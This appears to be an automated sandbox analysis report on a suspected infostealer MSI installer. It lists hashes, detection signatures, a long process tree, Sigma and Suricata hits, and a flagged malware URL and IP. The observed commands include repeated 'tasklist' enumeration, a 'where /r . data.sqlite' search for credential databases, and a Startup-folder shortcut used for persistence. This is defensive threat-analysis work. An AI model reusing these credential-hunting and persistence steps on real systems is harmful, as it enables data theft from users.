Edit tour

Windows Analysis Report
TamenuV11.msi

Overview

General Information

Sample name:	TamenuV11.msi
Analysis ID:	1483655
MD5:	bfd21c5d760a0cf2fd14d6648c60a18b
SHA1:	cc62d9e2759cc5147146b6173ef2895c6e5ec60a
SHA256:	34148411a1b67e5cc5af2997f0413edbd6e05c5784899a73acb50a84125d009f
Tags:	msi
Infos:

Detection

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for domain / URL

AI detected suspicious sample

Drops large PE files

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal communication platform credentials (via file / registry access)

Checks for available system drives (often done to infect USB drives)

Contains functionality to dynamically determine API calls

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Launches processes in debugging mode, may be used to hinder debugging

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries keyboard layouts

Queries the volume information (name, serial number etc) of a device

Searches for user specific document files

Sigma detected: Startup Folder File Write

Stores files to the Windows start menu directory

Too many similar processes found

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w10x64

msiexec.exe (PID: 5000 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\TamenuV11.msi" MD5: E5DA170027542E25EDE42FC54C929077)

msiexec.exe (PID: 6672 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)

Setup.exe (PID: 3992 cmdline: "C:\Users\user\AppData\Local\Programs\Setup\Setup.exe" MD5: 2B413D49C423BB99F05F8379154732CE)

Setup.exe (PID: 7356 cmdline: "C:\Users\user\AppData\Local\Programs\Setup\Setup.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1688 --field-trial-handle=1692,i,14834755097693353692,10985245987311762671,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 MD5: 2B413D49C423BB99F05F8379154732CE)

Shortcut.exe (PID: 7368 cmdline: C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe /A:C "/F:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.lnk" /T:C:\Users\user\AppData\Local\Programs\Setup\Setup.exe MD5: 59375510BDE2FF0DBA7A8197AD9F12BB)

conhost.exe (PID: 7376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7436 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7488 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7528 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7616 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7544 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7704 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7556 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7728 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7584 cmdline: C:\Windows\system32\cmd.exe /d /s /c "where /r . data.sqlite" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

where.exe (PID: 7752 cmdline: where /r . data.sqlite MD5: 3CF958B0F63FB1D74F7FCFE14B039A58)

Conhost.exe (PID: 5164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 2088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7892 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7940 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7972 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 8088 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

Conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Setup.exe (PID: 7988 cmdline: "C:\Users\user\AppData\Local\Programs\Setup\Setup.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --mojo-platform-channel-handle=2248 --field-trial-handle=1692,i,14834755097693353692,10985245987311762671,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8 MD5: 2B413D49C423BB99F05F8379154732CE)

cmd.exe (PID: 4020 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 5024 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

Conhost.exe (PID: 7244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7424 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7456 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

Conhost.exe (PID: 2136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7496 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7444 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7780 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7680 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 2088 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7840 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 2844 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7720 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

Conhost.exe (PID: 5632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6616 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 6880 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

Conhost.exe (PID: 6776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7456 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 1312 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

Conhost.exe (PID: 7444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5428 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7836 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 3896 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7592 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

Conhost.exe (PID: 6072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7948 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 8164 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

Conhost.exe (PID: 6500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3732 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

Conhost.exe (PID: 7852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 4312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 3588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 2252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 6320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 6484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 6164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 3732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 4312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 4020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 7780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 7456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Setup.exe (PID: 2076 cmdline: "C:\Users\user\AppData\Local\Programs\Setup\Setup.exe" MD5: 2B413D49C423BB99F05F8379154732CE)

Setup.exe (PID: 7732 cmdline: "C:\Users\user\AppData\Local\Programs\Setup\Setup.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1648 --field-trial-handle=1764,i,3145727516655865599,8822023245888026874,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 MD5: 2B413D49C423BB99F05F8379154732CE)

cmd.exe (PID: 7600 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7932 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

Setup.exe (PID: 7892 cmdline: "C:\Users\user\AppData\Local\Programs\Setup\Setup.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --mojo-platform-channel-handle=2304 --field-trial-handle=1764,i,3145727516655865599,8822023245888026874,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8 MD5: 2B413D49C423BB99F05F8379154732CE)

cmd.exe (PID: 6992 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 2336 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7012 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 8068 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

Conhost.exe (PID: 1404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7048 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 3732 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

conhost.exe (PID: 8076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7156 cmdline: C:\Windows\system32\cmd.exe /d /s /c "where /r . data.sqlite" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

where.exe (PID: 1704 cmdline: where /r . data.sqlite MD5: 3CF958B0F63FB1D74F7FCFE14B039A58)

cmd.exe (PID: 7396 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7512 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7724 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 7784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7856 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7912 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 2844 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7932 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 5184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 5804 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 6600 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 6856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 1716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 6992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 1404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 6976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 8088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 7396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 6016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 2688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 7880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 5804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 7592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 6016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 2836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 5804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 3852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 8088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 7484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 4336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 6932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 4080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 7024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 3796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 6856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 7932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Sigma Signatures

System Summary

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\system32\cmd.exe /d /s /c "where /r . data.sqlite", CommandLine: C:\Windows\system32\cmd.exe /d /s /c "where /r . data.sqlite", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Programs\Setup\Setup.exe", ParentImage: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe, ParentProcessId: 3992, ParentProcessName: Setup.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /d /s /c "where /r . data.sqlite", ProcessId: 7584, ProcessName: cmd.exe

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe, ProcessId: 7368, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.lnk

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 20.114.59.183 - Destination IP: 192.168.2.4

Timestamp:	2024-07-28T14:19:11.040670+0200
SID:	2022930
Source Port:	443
Destination Port:	49743
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 20.114.59.183 - Destination IP: 192.168.2.4

Timestamp:	2024-07-28T14:18:31.480828+0200
SID:	2022930
Source Port:	443
Destination Port:	49730
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for domain / URL

Source: http://92.246.138.20/storage

Virustotal: Detection: 9%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 97.3% probability

Source: C:\Windows\System32\msiexec.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{8C7A072A-3005-48F5-AE5F-6D02D608DF59}

Jump to behavior

Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Programs\Setup\LICENSE.electron.txt			Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\ReadMe.txt			Jump to behavior

Source: C:\Windows\System32\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: u:	Jump to behavior
